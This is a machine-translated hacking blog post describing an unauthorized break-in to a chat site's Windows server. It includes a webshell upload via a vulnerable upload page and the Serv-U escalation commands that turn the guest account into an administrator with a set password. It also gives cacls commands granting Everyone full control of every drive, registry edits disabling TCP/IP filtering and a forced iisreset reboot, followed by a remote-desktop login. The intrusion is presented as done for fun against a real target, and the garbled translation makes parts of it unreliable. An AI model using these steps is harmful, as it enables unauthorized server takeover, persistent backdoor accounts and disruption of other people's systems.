1. Obtain webshell
In a small test this evening, because I am too fond of food, I will not be able to learn more advanced technologies. I can only do this ..........
Everything has passed and there is no way to make up the picture. I hope I can understand this small post.
Today is a boring day. If you are bored at night, you can go to a video chat site to watch the show ~
Suddenly I found a special fire in a chat room. There were already 500 people in the room (full), and I didn't go into the room after being refreshed for n times .......... even more depressing! :(
I think there is nothing to do. Let's test how the host security is done)
Ping cmd to get the ip address of the other party, and then log on to the terminal'
After a long search, I finally found a mobile and vulnerable page at http://www.xxxx.net/upfile_soft.asp, and uploaded a webshell (official version of Haiyang 2005) First (how to upload it is not so cool, and the upload tool is now full of sky ).
2. successfully elevated permissions to create a user
After obtaining the webshell, I log on happily and suddenly found that no permissions are available. I can only compress it in the directory where my webshell is located (c. d. e. drive F cannot be browsed), even the permission to delete the file is not available, depressing ........
Go back to Server and check what services are enabled on the host. after discovering that the host has enabled Terminal Services and serv-u services, ha, now, I started scanning his ip address with superscan, And I saw through the banner that he was using serv-u, version 5.0.
To Wscript. if you can run the cmd command in Shell, the command cannot be executed. The command is not reflected after the net user is input. Try again through Wscript. shell can execute the cmd command. No, enter the net user again, and then execute the command to return the user list of the other party. Haha, this is good. You can win it !!
Upload the serv-u lifting tool to D:/a004/tggtwe /****. under the com/UploadSoft directory, change it to test.exe, and then return to 〖 Wscript. run the command in Shell. Hey, a fat chicken will be ready soon ~
Run the cmd command through Wscript. Shell:
D:/a004/tggtwe/*****. com/UploadSoft/test.exe "net user guest/active: yes" # activate the guest account. I like to use this account.
D:/a004/tggtwe/*****. com/UploadSoft/test.exe "net user guest lvhuana" # Set the password of the guest account to lvhuana
D:/a004/tggtwe/*****. com/UploadSoft/test.exe "net localgroup administrators guest/add" # Upgrade the guest permission to the admin permission
Okay. After the account is created, run the net localgroup administrators command to check whether the account is successfully added. The Echo shows that the account is successfully added. Run netstat-an and then you will see that the port opened by netstat is the default 338 Array. OK. Try connecting to it ~
Iii. TCP/IP Filtering
Unable to connect !? Dizzy ...... then take out superscan to scan his 338 Array, and there is no such scan ...... (open the firewall !? Oh, my point is really back .....)
No way. Go back to Wscript. Shell and execute the cmd command:
D:/a004/tggtwe/*****. com/UploadSoft/test.exe "cacls.exe c:/e/t/g everyone: F" # Set drive c to everyone for browsing
D:/a004/tggtwe/*****. com/UploadSoft/test.exe "cacls.exe d:/e/t/g everyone: F" # Set D disk to everyone for browsing
D:/a004/tggtwe/*****. com/UploadSoft/test.exe "cacls.exe e:/e/t/g everyone: F" # Set the e disk to everyone for browsing
D:/a004/tggtwe/*****. com/UploadSoft/test.exe "cacls.exe f:/e/t/g everyone: F" # Set drive f to everyone for browsing
I can at least traverse the entire hard disk. I rummaged around in the hard disk and couldn't find any firewall file. I knew it now, it must have been his TCP/IP screening! (Of course, it is also possible to use the Intranet as a server. You can determine the server based on ipconfig-all)
To break through TCP/IP filtering, we can change the Registry. We need to export three of the Registry, and then import the Registry. we can return to the "Wscript" page. shell command:
D:/a004/tggtwe /****. com/UploadSoft/test.exe "regedit-e D:/a004/tggtwe /****. com/UploadSoft/1.reg HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Services/Tcpip "# export the first part of TCP/IP filtering in the Registry
D:/a004/tggtwe /****. com/UploadSoft/test.exe "regedit-e D:/a004/tggtwe /****. com/UploadSoft/2.reg HKEY_LOCAL_MACHINE/SYSTEM/ControlSet002/Services/Tcpip "# export the second part about TCP/IP filtering in the Registry
D:/a004/tggtwe /****. com/UploadSoft/test.exe "regedit-e D:/a004/tggtwe /****. com/UploadSoft/3.reg HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip "# export the third part about TCP/IP filtering in the Registry
Then return to Stream or FSO and find that 1.reg, 2.reg, 3. reg has been quietly lying there ~
Set 1.reg, 2.reg, 3. reg is downloaded back to your hard disk and edited. Change the TCP/IP filtering areas. 1. reg finds "EnableSecurityFilters" = dword: 00000001, changes the last number 1 to 0, and then changes 2.reg, 3.reg. the change method is the same, and I will not be arrogant ~
Then we set 1.reg, 2.reg, 3. reg then returns the data to the target machine (Here we want to select the overwrite mode, because we do not have the permission to delete the original 1.reg, 2.reg, 3.reg). After the upload is successful, we will return to the 〖 Wscript. shell command:
D:/a004/tggtwe /****. com/UploadSoft/test.exe "regedit-s D:/a004/tggtwe /****. com/UploadSoft/1.reg" # In quiet mode, 1. reg import to his registry
D:/a004/tggtwe /****. com/UploadSoft/test.exe "regedit-s D:/a004/tggtwe /****. com/UploadSoft/2.reg" # In quiet mode, complete the modification. reg import to his registry
D:/a004/tggtwe /****. com/UploadSoft/test.exe "regedit-s D:/a004/tggtwe /****. com/UploadSoft/3.reg" #3. reg import to his registry
OK! After the import, restart the machine and solve the TCP/IP filtering problem. Then, run the cmd command in "Wscript. Shell:
D:/a004/tggtwe /****. com/UploadSoft/test.exe "iisreset/reboot/timeout: 00" # use his own iis service to restart his machine. The/timeout: 00 parameter allows him to restart immediately
After the execution, we can no longer use superscan to scan him ~ Restarted!
4. log on to the Apsara stack console successfully.
After a long wait (in fact, the time is not long, but I can't wait here, hey ~), Finally, I can use superscan to scan him and scan his 338Array port. Haha, I finally succeeded. I took out the terminal login device and used the user: guest, pass: lvhuana is logged on!
Well, this spam article is now at www.2cto.com, and it's time to stop working and sleep ~